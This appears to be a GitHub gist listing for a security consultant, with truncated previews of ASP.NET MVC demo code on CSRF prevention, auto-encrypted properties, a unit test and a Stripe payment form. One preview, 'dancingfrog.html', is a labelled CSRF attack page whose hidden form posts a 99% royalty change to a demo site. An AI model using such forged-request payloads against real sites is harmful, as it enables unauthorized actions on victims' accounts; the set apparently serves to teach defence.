Joe Kuemerle jkuemerle

A security consultant, developer & speaker in the greater New York City area specializing in application security, development, database and app lifecycle topic

18 followers · 4 following

New York City Area
www.kuemerle.com

View GitHub Profile

Recently created

Least recently created

Recently updated

Least recently updated

jkuemerle / RoyaltyController

Created August 8, 2012 13:33

"Secure" Royalty Controller

	using System.Web.Mvc;

	namespace WebApplication.Controllers
	{
	public class RoyaltyController : Controller
	{
	public ActionResult Index()
	{
	return View();
	}

jkuemerle / dancingfrog.html

Created August 8, 2012 14:28

Dancing Frog Attack (exploits CSRF vulnerability)

	<html>
	<head>
	<title>Dancing Frog!!!</title>
	</head>
	<body>
	<form name="evilform" method="post" action="http://elcheapo.com/Royalty/Edit">
	<input type="hidden" id="RoyaltyPercent" name="RoyaltyPercent" type="text" value="99" />
	<input id="AuthorID" name="AuthorID" type="hidden" value="213-46-8915" />
	<input id="TitleID" name="TitleID" type="hidden" value="BU1032" />
	</form>

jkuemerle / CSRFAttribute.cs

Created August 8, 2012 16:07

CSRF Prevention Aspect for ASP.NET MVC and PostSharp

	using System;
	using System.IO;
	using System.Linq;
	using System.Reflection;
	using System.Web.Mvc;

	using PostSharp.Aspects;
	using PostSharp.Extensibility;

	namespace WebApplication.Aspects

jkuemerle / VerifyControllerAttribute.cs

Created August 11, 2012 03:38

ASP.NET MVC Controller verification aspect

	using System;
	using System.IO;
	using System.Web.Mvc;

	using PostSharp.Aspects;
	using PostSharp.Extensibility;

	namespace WebApplication.Aspects {
	[Serializable]
	public class VerifyControllerAttribute : TypeLevelAspect {

jkuemerle / Credential.cs

Created August 30, 2012 02:54

Credential DTO with encrypted property attributes

	namespace DataAccess.DTO
	{
	[Aspects.EncryptedType]
	public class Credential
	{
	public string LoginName { get; set; }

	[Aspects.Encrypted]
	public string Password { get; set; }

jkuemerle / IEncrypted.cs

Created August 30, 2012 03:00

IEncrypted interface for types that have auto encrypted properties

	namespace DataAccess.Aspects
	{
	public interface IEncrypted
	{
	object AsClear(string Name);
	}
	}

jkuemerle / EncryptedTypeAttribute.cs

Created August 30, 2012 03:12

Attribute to decorate the type declaration for a class that has auto encrypted properties

	using System;
	using System.Collections.Generic;
	using System.Security.Cryptography;

	using PostSharp.Aspects;
	using PostSharp.Aspects.Advices;
	using PostSharp.Aspects.Dependencies;

	namespace DataAccess.Aspects {
	[Serializable]

jkuemerle / EncryptedAttribute.cs

Created August 30, 2012 03:35

Attribute to decorate automatically encrypted properties

	using System;
	using System.Collections.Generic;
	using System.Security.Cryptography;

	using PostSharp.Aspects;
	using PostSharp.Aspects.Dependencies;
	using PostSharp.Aspects.Advices;

	namespace DataAccess.Aspects {
	[Serializable]

jkuemerle / CredentialTest.cs

Created August 30, 2012 03:53

Unit test showing automatically encrypted property

	using MbUnit.Framework;

	namespace DataAccessTests {
	[TestFixture]
	public class CredentialTest
	{
	[Test]
	public void TestPasswordIsEncrypted() {
	var cr = new DataAccess.DTO.Credential();
	cr.Password = "Password1!";

jkuemerle / payment.html

Created October 15, 2012 03:49

Payment Form

	<HTML><HEAD>
	<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js"></script>
	<SCRIPT type="text/javascript" src="https://js.stripe.com/v1/"></SCRIPT>
	<SCRIPT >
	Stripe.setPublishableKey('<Stripe Public Key Here>');

	function formSubmit() {
	if(validatePage() == true) {
	$('.submit-button').attr("disabled", "disabled");
	$("#processing").html("Processing credit card...");

OlderNewer